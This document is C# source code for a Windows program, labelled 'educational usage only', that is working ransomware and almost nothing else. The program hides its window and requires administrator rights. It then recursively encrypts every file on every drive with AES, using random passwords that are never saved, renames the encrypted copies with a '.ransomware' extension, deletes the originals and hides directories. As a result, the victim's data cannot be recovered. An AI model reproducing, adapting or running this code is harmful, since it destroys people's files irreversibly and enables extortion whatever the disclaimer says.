Disclaimer: This example is for educational usage only!!!
Using the AESCrypt library from here
using System; using System.IO; using System.Linq; using System.Security.Cryptography; using System.Security.Principal; using System.Text; using System.Threading; using System.Windows.Forms; using Config; using Properties; using AESCrypt = SharpAESCrypt.SharpAESCrypt; public partial class Main : Form { private readonly Random _random = new Random(); private Thread _thread; public Main() { InitializeComponent(); Configure(); } protected override void SetVisibleCore(bool value) { base.SetVisibleCore(false); } private void Configure() { CheckAdminPrivileges(); InitThread(); } private void CheckAdminPrivileges() { if (IsElevated()) return; MessageBox.Show("Please run the programm in administrator mode", "Administrator mode needed", MessageBoxButtons.OK, MessageBoxIcon.Error); Environment.Exit(0); } private void InitThread() { _thread = new Thread(Run); _thread.Start(); } private string GetRandomPassword() { var alg = SHA512.Create(); alg.ComputeHash(Encoding.UTF8.GetBytes(DateTime.Now.ToLongDateString() + _random.Next(int.MaxValue))); return BitConverter.ToString(alg.Hash); } private void Run() { foreach (var drive in DriveInfo.GetDrives()) { try { EncryptFs(drive.Name); } catch { // ignored } } } private void EncryptFs(string directory) { foreach (var file in Directory.GetFiles(directory)) { try { if (file == null) continue; AESCrypt.Encrypt(GetRandomPassword(), file, Path.Combine(directory, Path.GetFileNameWithoutExtension(file)) + ".ransomware"); File.Delete(file); } catch { // ignored } } foreach (var dir in Directory.GetDirectories(directory)) { HideDirectory(dir); EncryptFs(dir); } } private void HideDirectory(string dir) { var di = new DirectoryInfo(dir); if ((di.Attributes & FileAttributes.Hidden) != FileAttributes.Hidden) { di.Attributes |= FileAttributes.Hidden; } } private bool IsElevated() { var id = WindowsIdentity.GetCurrent(); return id.Owner != id.User; } }
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